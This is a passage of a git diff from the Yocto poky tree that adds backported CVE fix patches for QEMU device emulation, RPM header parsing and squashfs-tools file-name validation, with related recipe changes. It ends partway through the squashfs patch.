+From: Li Qiang <liq3ea@163.com> +Date: Sat, 15 May 2021 20:03:56 -0700 +Subject: [PATCH] vhost-user-gpu: fix memory disclosure in + virgl_cmd_get_capset_info (CVE-2021-3545) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Otherwise some of the 'resp' will be leaked to guest. + +Fixes: CVE-2021-3545 +Reported-by: Li Qiang <liq3ea@163.com> +virtio-gpu fix: 42a8dadc74 ("virtio-gpu: fix information leak +in getting capset info dispatch") + +Signed-off-by: Li Qiang <liq3ea@163.com> +Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210516030403.107723-2-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2021-3545 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + contrib/vhost-user-gpu/virgl.c | 1 + + 1 file changed, 1 insertion(+) + +Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +@@ -132,6 +132,7 @@ virgl_cmd_get_capset_info(VuGpu *g, + + VUGPU_FILL_CMD(info); + ++ memset(&resp, 0, sizeof(resp)); + if (info.capset_index == 0) { + resp.capset_id = VIRTIO_GPU_CAPSET_VIRGL; + virgl_renderer_get_cap_set(resp.capset_id, diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch new file mode 100644 index 0000000000..f8da428233 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch @@ -0,0 +1,47 @@ +From 9f22893adcb02580aee5968f32baa2cd109b3ec2 Mon Sep 17 00:00:00 2001 +From: Li Qiang <liq3ea@163.com> +Date: Sat, 15 May 2021 20:04:02 -0700 +Subject: [PATCH] vhost-user-gpu: fix OOB write in 'virgl_cmd_get_capset' + (CVE-2021-3546) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +If 'virgl_cmd_get_capset' set 'max_size' to 0, +the 'virgl_renderer_fill_caps' will write the data after the 'resp'. +This patch avoid this by checking the returned 'max_size'. + +virtio-gpu fix: abd7f08b23 ("display: virtio-gpu-3d: check +virgl capabilities max_size") + +Fixes: CVE-2021-3546 +Reported-by: Li Qiang <liq3ea@163.com> +Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org> +Signed-off-by: Li Qiang <liq3ea@163.com> +Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210516030403.107723-8-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2021-3546 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + contrib/vhost-user-gpu/virgl.c | 4 ++++ + 1 file changed, 4 insertions(+) + +Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +@@ -174,6 +174,10 @@ virgl_cmd_get_capset(VuGpu *g, + + virgl_renderer_get_cap_set(gc.capset_id, &max_ver, + &max_size); ++ if (!max_size) { ++ cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_PARAMETER; ++ return; ++ } + resp = g_malloc0(sizeof(*resp) + max_size); + + resp->hdr.type = VIRTIO_GPU_RESP_OK_CAPSET; diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch new file mode 100644 index 0000000000..7a88e29384 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch @@ -0,0 +1,47 @@ +From 284f191b4abad213aed04cb0458e1600fd18d7c4 Mon Sep 17 00:00:00 2001 +From: Marcel Apfelbaum <marcel@redhat.com> +Date: Wed, 16 Jun 2021 14:06:00 +0300 +Subject: [PATCH] hw/rdma: Fix possible mremap overflow in the pvrdma device + (CVE-2021-3582) + +Ensure mremap boundaries not trusting the guest kernel to +pass the correct buffer length. + +Fixes: CVE-2021-3582 +Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com> +Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com> +Signed-off-by: Marcel Apfelbaum <marcel@redhat.com> +Message-Id: <20210616110600.20889-1-marcel.apfelbaum@gmail.com> +Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com> +Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com> +Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org> +Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> + +CVE: CVE-2021-3582 +Upstream-Status: Backport [284f191b4abad213aed04cb0458e1600fd18d7c4] +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/rdma/vmw/pvrdma_cmd.c | 7 +++++++ + 1 file changed, 7 insertions(+) + +diff --git a/hw/rdma/vmw/pvrdma_cmd.c b/hw/rdma/vmw/pvrdma_cmd.c +index f59879e257..da7ddfa548 100644 +--- a/hw/rdma/vmw/pvrdma_cmd.c ++++ b/hw/rdma/vmw/pvrdma_cmd.c +@@ -38,6 +38,13 @@ static void *pvrdma_map_to_pdir(PCIDevice *pdev, uint64_t pdir_dma, + return NULL; + } + ++ length = ROUND_UP(length, TARGET_PAGE_SIZE); ++ if (nchunks * TARGET_PAGE_SIZE != length) { ++ rdma_error_report("Invalid nchunks/length (%u, %lu)", nchunks, ++ (unsigned long)length); ++ return NULL; ++ } ++ + dir = rdma_pci_dma_map(pdev, pdir_dma, TARGET_PAGE_SIZE); + if (!dir) { + rdma_error_report("Failed to map to page directory"); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch new file mode 100644 index 0000000000..0547c74484 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch @@ -0,0 +1,43 @@ +From 32e5703cfea07c91e6e84bcb0313f633bb146534 Mon Sep 17 00:00:00 2001 +From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> +Date: Wed, 30 Jun 2021 14:46:34 +0300 +Subject: [PATCH] pvrdma: Ensure correct input on ring init (CVE-2021-3607) + +Check the guest passed a non zero page count +for pvrdma device ring buffers. + +Fixes: CVE-2021-3607 +Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com> +Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com> +Signed-off-by: Marcel Apfelbaum <marcel@redhat.com> +Message-Id: <20210630114634.2168872-1-marcel@redhat.com> +Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com> +Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com> +Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> + +CVE: CVE-2021-3607 +Upstream-Status: Backport [32e5703cfea07c91e6e84bcb0313f633bb146534] +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/rdma/vmw/pvrdma_main.c | 5 +++++ + 1 file changed, 5 insertions(+) + +diff --git a/hw/rdma/vmw/pvrdma_main.c b/hw/rdma/vmw/pvrdma_main.c +index 84ae8024fc..7c0c3551a8 100644 +--- a/hw/rdma/vmw/pvrdma_main.c ++++ b/hw/rdma/vmw/pvrdma_main.c +@@ -92,6 +92,11 @@ static int init_dev_ring(PvrdmaRing *ring, PvrdmaRingState **ring_state, + uint64_t *dir, *tbl; + int rc = 0; + ++ if (!num_pages) { ++ rdma_error_report("Ring pages count must be strictly positive"); ++ return -EINVAL; ++ } ++ + dir = rdma_pci_dma_map(pci_dev, dir_addr, TARGET_PAGE_SIZE); + if (!dir) { + rdma_error_report("Failed to map to page directory (ring %s)", name); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch new file mode 100644 index 0000000000..7055ec3d23 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch @@ -0,0 +1,40 @@ +From 66ae37d8cc313f89272e711174a846a229bcdbd3 Mon Sep 17 00:00:00 2001 +From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> +Date: Wed, 30 Jun 2021 14:52:46 +0300 +Subject: [PATCH] pvrdma: Fix the ring init error flow (CVE-2021-3608) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Do not unmap uninitialized dma addresses. + +Fixes: CVE-2021-3608 +Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com> +Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com> +Signed-off-by: Marcel Apfelbaum <marcel@redhat.com> +Message-Id: <20210630115246.2178219-1-marcel@redhat.com> +Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com> +Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com> +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> + +CVE: CVE-2021-3608 +Upstream-Status: Backport [66ae37d8cc313f89272e711174a846a229bcdbd3] +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/rdma/vmw/pvrdma_dev_ring.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c +=================================================================== +--- qemu-4.2.0.orig/hw/rdma/vmw/pvrdma_dev_ring.c ++++ qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c +@@ -41,7 +41,7 @@ int pvrdma_ring_init(PvrdmaRing *ring, c + atomic_set(&ring->ring_state->cons_head, 0); + */ + ring->npages = npages; +- ring->pages = g_malloc(npages * sizeof(void *)); ++ ring->pages = g_malloc0(npages * sizeof(void *)); + + for (i = 0; i < npages; i++) { + if (!tbl[i]) { diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch new file mode 100644 index 0000000000..50a49233d3 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch @@ -0,0 +1,41 @@ +From 5e796671e6b8d5de4b0b423dce1b3eba144a92c9 Mon Sep 17 00:00:00 2001 +From: Gerd Hoffmann <kraxel@redhat.com> +Date: Thu, 22 Jul 2021 09:27:56 +0200 +Subject: [PATCH] usbredir: fix free call +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +data might point into the middle of a larger buffer, there is a separate +free_on_destroy pointer passed into bufp_alloc() to handle that. It is +only used in the normal workflow though, not when dropping packets due +to the queue being full. Fix that. + +Resolves: https://gitlab.com/qemu-project/qemu/-/issues/491 +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> +Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210722072756.647673-1-kraxel@redhat.com> + +CVE: CVE-2021-3682 +Upstream-Status: Backport [5e796671e6b8d5de4b0b423dce1b3eba144a92c9] +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/usb/redirect.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c +index 4ec9326e05..1ec909a63a 100644 +--- a/hw/usb/redirect.c ++++ b/hw/usb/redirect.c +@@ -476,7 +476,7 @@ static int bufp_alloc(USBRedirDevice *dev, uint8_t *data, uint16_t len, + if (dev->endpoint[EP2I(ep)].bufpq_dropping_packets) { + if (dev->endpoint[EP2I(ep)].bufpq_size > + dev->endpoint[EP2I(ep)].bufpq_target_size) { +- free(data); ++ free(free_on_destroy); + return -1; + } + dev->endpoint[EP2I(ep)].bufpq_dropping_packets = 0; +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch b/poky/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch index 6454785254..dc3f74fecd 100644 --- a/poky/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch +++ b/poky/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch @@ -11,36 +11,39 @@ CPU thread. Upstream-Status: Pending [merge of multithreading patches to upstream] Signed-off-by: Peter Bergin <peter@berginkonsult.se> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> --- - rpmio/rpmio.c | 34 ++++++++++++++++++++++++++++++++++ - 1 file changed, 34 insertions(+) + rpmio/rpmio.c | 36 ++++++++++++++++++++++++++++++++++++ + 1 file changed, 36 insertions(+) diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c index e051c98..b3c56b6 100644 --- a/rpmio/rpmio.c +++ b/rpmio/rpmio.c -@@ -845,6 +845,40 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz) +@@ -845,6 +845,42 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz) } #endif -+ struct rlimit virtual_memory; -+ getrlimit(RLIMIT_AS, &virtual_memory); -+ if (virtual_memory.rlim_cur != RLIM_INFINITY) { ++ struct rlimit virtual_memory = {RLIM_INFINITY , RLIM_INFINITY}; ++ int status = getrlimit(RLIMIT_AS, &virtual_memory); ++ if ((status != -1) && (virtual_memory.rlim_cur != RLIM_INFINITY)) { + const uint64_t virtual_memlimit = virtual_memory.rlim_cur; ++ uint32_t threads_max = lzma_cputhreads(); + const uint64_t virtual_memlimit_per_cpu_thread = -+ virtual_memlimit / lzma_cputhreads(); -+ uint64_t memory_usage_virt; ++ virtual_memlimit / ((threads_max == 0) ? 1 : threads_max); + rpmlog(RPMLOG_NOTICE, "XZ: virtual memory restricted to %lu and " + "per CPU thread %lu\n", virtual_memlimit, virtual_memlimit_per_cpu_thread); ++ uint64_t memory_usage_virt; + /* keep reducing the number of compression threads until memory + usage falls below the limit per CPU thread*/ + while ((memory_usage_virt = lzma_stream_encoder_mt_memusage(&mt_options)) > + virtual_memlimit_per_cpu_thread) { -+ /* If number of threads goes down to zero lzma_stream_encoder will -+ * will return UINT64_MAX. We must check here to avoid an infinite loop. ++ /* If number of threads goes down to zero or in case of any other error ++ * lzma_stream_encoder_mt_memusage will return UINT64_MAX. We must check ++ * for both the cases here to avoid an infinite loop. + * If we get into situation that one thread requires more virtual memory + * than available we set one thread, print error message and try anyway. */ -+ if (--mt_options.threads == 0) { ++ if ((--mt_options.threads == 0) || (memory_usage_virt == UINT64_MAX)) { + mt_options.threads = 1; + rpmlog(RPMLOG_WARNING, + "XZ: Could not adjust number of threads to get below " diff --git a/poky/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch b/poky/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch new file mode 100644 index 0000000000..f2fc47e321 --- /dev/null +++ b/poky/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch @@ -0,0 +1,109 @@ +From ebbf0f0133c498d229e94ecf2ed0b41d6e6a142a Mon Sep 17 00:00:00 2001 +From: Demi Marie Obenour <athena@invisiblethingslab.com> +Date: Mon, 8 Feb 2021 16:05:01 -0500 +Subject: [PATCH] hdrblobInit() needs bounds checks too + +Users can pass untrusted data to hdrblobInit() and it must be robust +against this. + +Backported from commit 8f4b3c3cab8922a2022b9e47c71f1ecf906077ef + +Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/pull/1587/commits/9646711891df851dfbf7ef54cc171574a0914b15] +CVE: CVE-2021-20266 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + lib/header.c | 48 +++++++++++++++++++++++++++++++----------------- + 1 file changed, 31 insertions(+), 17 deletions(-) + +diff --git a/lib/header.c b/lib/header.c +index 5b09f8352..ad5b6dc57 100644 +--- a/lib/header.c ++++ b/lib/header.c +@@ -11,6 +11,7 @@ + #include "system.h" + #include <netdb.h> + #include <errno.h> ++#include <inttypes.h> + #include <rpm/rpmtypes.h> + #include <rpm/rpmstring.h> + #include "lib/header_internal.h" +@@ -1890,6 +1891,25 @@ hdrblob hdrblobFree(hdrblob blob) + return NULL; + } + ++static rpmRC hdrblobVerifyLengths(rpmTagVal regionTag, uint32_t il, uint32_t dl, ++ char **emsg) { ++ uint32_t il_max = HEADER_TAGS_MAX; ++ uint32_t dl_max = HEADER_DATA_MAX; ++ if (regionTag == RPMTAG_HEADERSIGNATURES) { ++ il_max = 32; ++ dl_max = 8192; ++ } ++ if (hdrchkRange(il_max, il)) { ++ rasprintf(emsg, _("hdr tags: BAD, no. of tags(%" PRIu32 ") out of range"), il); ++ return RPMRC_FAIL; ++ } ++ if (hdrchkRange(dl_max, dl)) { ++ rasprintf(emsg, _("hdr data: BAD, no. of bytes(%" PRIu32 ") out of range"), dl); ++ return RPMRC_FAIL; ++ } ++ return RPMRC_OK; ++} ++ + rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrblob blob, char **emsg) + { + int32_t block[4]; +@@ -1902,13 +1922,6 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl + size_t nb; + rpmRC rc = RPMRC_FAIL; /* assume failure */ + int xx; +- int32_t il_max = HEADER_TAGS_MAX; +- int32_t dl_max = HEADER_DATA_MAX; +- +- if (regionTag == RPMTAG_HEADERSIGNATURES) { +- il_max = 32; +- dl_max = 8192; +- } + + memset(block, 0, sizeof(block)); + if ((xx = Freadall(fd, bs, blen)) != blen) { +@@ -1921,15 +1934,9 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl + goto exit; + } + il = ntohl(block[2]); +- if (hdrchkRange(il_max, il)) { +- rasprintf(emsg, _("hdr tags: BAD, no. of tags(%d) out of range"), il); +- goto exit; +- } + dl = ntohl(block[3]); +- if (hdrchkRange(dl_max, dl)) { +- rasprintf(emsg, _("hdr data: BAD, no. of bytes(%d) out of range"), dl); ++ if (hdrblobVerifyLengths(regionTag, il, dl, emsg)) + goto exit; +- } + + nb = (il * sizeof(struct entryInfo_s)) + dl; + uc = sizeof(il) + sizeof(dl) + nb; +@@ -1973,11 +1980,18 @@ rpmRC hdrblobInit(const void *uh, size_t uc, + struct hdrblob_s *blob, char **emsg) + { + rpmRC rc = RPMRC_FAIL; +- + memset(blob, 0, sizeof(*blob)); ++ if (uc && uc < 8) { ++ rasprintf(emsg, _("hdr length: BAD")); ++ goto exit; ++ } ++ + blob->ei = (int32_t *) uh; /* discards const */ +- blob->il = ntohl(blob->ei[0]); +- blob->dl = ntohl(blob->ei[1]); ++ blob->il = ntohl((uint32_t)(blob->ei[0])); ++ blob->dl = ntohl((uint32_t)(blob->ei[1])); ++ if (hdrblobVerifyLengths(regionTag, blob->il, blob->dl, emsg) != RPMRC_OK) ++ goto exit; ++ + blob->pe = (entryInfo) &(blob->ei[2]); + blob->pvlen = sizeof(blob->il) + sizeof(blob->dl) + + (blob->il * sizeof(*blob->pe)) + blob->dl; diff --git a/poky/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb b/poky/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb index 018b2f8700..c39a5208e5 100644 --- a/poky/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb +++ b/poky/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb @@ -24,7 +24,7 @@ HOMEPAGE = "http://www.rpm.org" LICENSE = "GPL-2.0" LIC_FILES_CHKSUM = "file://COPYING;md5=c0bf017c0fd1920e6158a333acabfd4a" -SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \ +SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x;protocol=https \ file://0001-Do-not-add-an-unsatisfiable-dependency-when-building.patch \ file://0001-Do-not-read-config-files-from-HOME.patch \ file://0001-When-cross-installing-execute-package-scriptlets-wit.patch \ @@ -45,6 +45,7 @@ SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \ file://0001-Rip-out-partial-support-for-unused-MD2-and-RIPEMD160.patch \ file://0001-rpmplugins.c-call-dlerror-prior-to-dlsym.patch \ file://CVE-2021-3421.patch \ + file://CVE-2021-20266.patch \ " PE = "1" @@ -61,7 +62,8 @@ export PYTHON_ABI # OE-core patches autoreconf to additionally run gnu-configize, which fails with this recipe EXTRA_AUTORECONF_append = " --exclude=gnu-configize" -EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl" +# Vendor is detected differently on x86 and aarch64 hosts and can feed into target packages +EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl --with-vendor=pc" EXTRA_OECONF_append_libc-musl = " --disable-nls" # --sysconfdir prevents rpm from attempting to access machine-specific configuration in sysroot/etc; we need to have it in rootfs diff --git a/poky/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch b/poky/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch new file mode 100644 index 0000000000..95e2534ee4 --- /dev/null +++ b/poky/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch @@ -0,0 +1,253 @@ +Backport patch to fix CVE-2021-40153, and remove version update in unsquashfs.c +for compatible. + +Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/79b5a55] +CVE: CVE-2021-40153 + +Signed-off-by: Kai Kang <kai.kang@windriver.com> + +From 79b5a555058eef4e1e7ff220c344d39f8cd09646 Mon Sep 17 00:00:00 2001 +From: Phillip Lougher <phillip@squashfs.org.uk> +Date: Sat, 16 Jan 2021 20:08:55 +0000 +Subject: [PATCH] Unsquashfs: fix write outside destination directory exploit + +An issue on Github (https://github.com/plougher/squashfs-tools/issues/72) +shows how some specially crafted Squashfs filesystems containing +invalid file names (with '/' and ..) can cause Unsquashfs to write +files outside of the destination directory. + +This commit fixes this exploit by checking all names for +validity. + +In doing so I have also added checks for '.' and for names that +are shorter than they should be (names in the file system should +not have '\0' terminators). + +Signed-off-by: Phillip Lougher <phillip@squashfs.org.uk> +--- + squashfs-tools/Makefile | 5 ++- + squashfs-tools/unsquash-1.c | 9 +++++- + squashfs-tools/unsquash-1234.c | 58 ++++++++++++++++++++++++++++++++++ + squashfs-tools/unsquash-2.c | 9 +++++- + squashfs-tools/unsquash-3.c | 9 +++++- + squashfs-tools/unsquash-4.c | 9 +++++- + squashfs-tools/unsquashfs.h | 5 ++- + 7 files changed, 98 insertions(+), 6 deletions(-) + create mode 100644 squashfs-tools/unsquash-1234.c + +diff --git a/squashfs-tools/Makefile b/squashfs-tools/Makefile +index aee4b960..20feaca2 100644 +--- a/squashfs-tools/Makefile ++++ b/squashfs-tools/Makefile +@@ -156,7 +156,8 @@ MKSQUASHFS_OBJS = mksquashfs.o read_fs.o action.o swap.o pseudo.o compressor.o \ + caches-queues-lists.o + + UNSQUASHFS_OBJS = unsquashfs.o unsquash-1.o unsquash-2.o unsquash-3.o \ +- unsquash-4.o unsquash-123.o unsquash-34.o swap.o compressor.o unsquashfs_info.o ++ unsquash-4.o unsquash-123.o unsquash-34.o unsquash-1234.o swap.o \ ++ compressor.o unsquashfs_info.o + + CFLAGS ?= -O2 + CFLAGS += $(EXTRA_CFLAGS) $(INCLUDEDIR) -D_FILE_OFFSET_BITS=64 \ +@@ -350,6 +351,8 @@ unsquash-123.o: unsquashfs.h unsquash-123.c squashfs_fs.h squashfs_compat.h + + unsquash-34.o: unsquashfs.h unsquash-34.c + ++unsquash-1234.o: unsquash-1234.c ++ + unsquashfs_xattr.o: unsquashfs_xattr.c unsquashfs.h squashfs_fs.h xattr.h + + unsquashfs_info.o: unsquashfs.h squashfs_fs.h +diff --git a/squashfs-tools/unsquash-1.c b/squashfs-tools/unsquash-1.c +index 34eced36..28326cb1 100644 +--- a/squashfs-tools/unsquash-1.c ++++ b/squashfs-tools/unsquash-1.c +@@ -2,7 +2,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. + * +- * Copyright (c) 2009, 2010, 2011, 2012, 2019 ++ * Copyright (c) 2009, 2010, 2011, 2012, 2019, 2021 + * Phillip Lougher <phillip@squashfs.org.uk> + * + * This program is free software; you can redistribute it and/or +@@ -285,6 +285,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse + memcpy(dire->name, directory_table + bytes, + dire->size + 1); + dire->name[dire->size + 1] = '\0'; ++ ++ /* check name for invalid characters (i.e /, ., ..) */ ++ if(check_name(dire->name, dire->size + 1) == FALSE) { ++ ERROR("File system corrupted: invalid characters in name\n"); ++ goto corrupted; ++ } ++ + TRACE("squashfs_opendir: directory entry %s, inode " + "%d:%d, type %d\n", dire->name, + dirh.start_block, dire->offset, dire->type); +diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c +new file mode 100644 +index 00000000..c2d4f42b +--- /dev/null ++++ b/squashfs-tools/unsquash-1234.c +@@ -0,0 +1,58 @@ ++/* ++ * Unsquash a squashfs filesystem. This is a highly compressed read only ++ * filesystem. ++ * ++ * Copyright (c) 2021 ++ * Phillip Lougher <phillip@squashfs.org.uk> ++ * ++ * This program is free software; you can redistribute it and/or ++ * modify it under the terms of the GNU General Public License ++ * as published by the Free Software Foundation; either version 2, ++ * or (at your option) any later version. ++ * ++ * This program is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ++ * GNU General Public License for more details. ++ * ++ * You should have received a copy of the GNU General Public License ++ * along with this program; if not, write to the Free Software ++ * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. ++ * ++ * unsquash-1234.c ++ * ++ * Helper functions used by unsquash-1, unsquash-2, unsquash-3 and ++ * unsquash-4. ++ */ ++ ++#define TRUE 1 ++#define FALSE 0 ++/* ++ * Check name for validity, name should not ++ * - be ".", "./", or ++ * - be "..", "../" or ++ * - have a "/" anywhere in the name, or ++ * - be shorter than the expected size ++ */ ++int check_name(char *name, int size) ++{ ++ char *start = name; ++ ++ if(name[0] == '.') { ++ if(name[1] == '.') ++ name++; ++ if(name[1] == '/' || name[1] == '\0') ++ return FALSE; ++ } ++ ++ while(name[0] != '/' && name[0] != '\0') ++ name ++; ++ ++ if(name[0] == '/') ++ return FALSE; ++ ++ if((name - start) != size) ++ return FALSE; ++ ++ return TRUE; ++} +diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c +index 4b3d767e..474064e1 100644 +--- a/squashfs-tools/unsquash-2.c ++++ b/squashfs-tools/unsquash-2.c +@@ -2,7 +2,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. + * +- * Copyright (c) 2009, 2010, 2013, 2019 ++ * Copyright (c) 2009, 2010, 2013, 2019, 2021 + * Phillip Lougher <phillip@squashfs.org.uk> + * + * This program is free software; you can redistribute it and/or +@@ -386,6 +386,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse + memcpy(dire->name, directory_table + bytes, + dire->size + 1); + dire->name[dire->size + 1] = '\0'; ++ ++ /* check name for invalid characters (i.e /, ., ..) */ ++ if(check_name(dire->name, dire->size + 1) == FALSE) { ++ ERROR("File system corrupted: invalid characters in name\n"); ++ goto corrupted; ++ } ++ + TRACE("squashfs_opendir: directory entry %s, inode " + "%d:%d, type %d\n", dire->name, + dirh.start_block, dire->offset, dire->type); +diff --git a/squashfs-tools/unsquash-3.c b/squashfs-tools/unsquash-3.c +index 02c31fc5..65cfe4d9 100644 +--- a/squashfs-tools/unsquash-3.c ++++ b/squashfs-tools/unsquash-3.c +@@ -2,7 +2,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. + * +- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019 ++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021 + * Phillip Lougher <phillip@squashfs.org.uk> + * + * This program is free software; you can redistribute it and/or +@@ -413,6 +413,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse + memcpy(dire->name, directory_table + bytes, + dire->size + 1); + dire->name[dire->size + 1] = '\0'; ++ ++ /* check name for invalid characters (i.e /, ., ..) */ ++ if(check_name(dire->name, dire->size + 1) == FALSE) { ++ ERROR("File system corrupted: invalid characters in name\n"); ++ goto corrupted; ++ } ++ + TRACE("squashfs_opendir: directory entry %s, inode " + "%d:%d, type %d\n", dire->name, + dirh.start_block, dire->offset, dire->type); +diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c +index 8475835c..aa23a841 100644 +--- a/squashfs-tools/unsquash-4.c ++++ b/squashfs-tools/unsquash-4.c +@@ -2,7 +2,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. + * +- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019 ++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021 + * Phillip Lougher <phillip@squashfs.org.uk> + * + * This program is free software; you can redistribute it and/or +@@ -349,6 +349,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse + memcpy(dire->name, directory_table + bytes, + dire->size + 1); + dire->name[dire->size + 1] = '\0'; ++ ++ /* check name for invalid characters (i.e /, ., ..) */ ++ 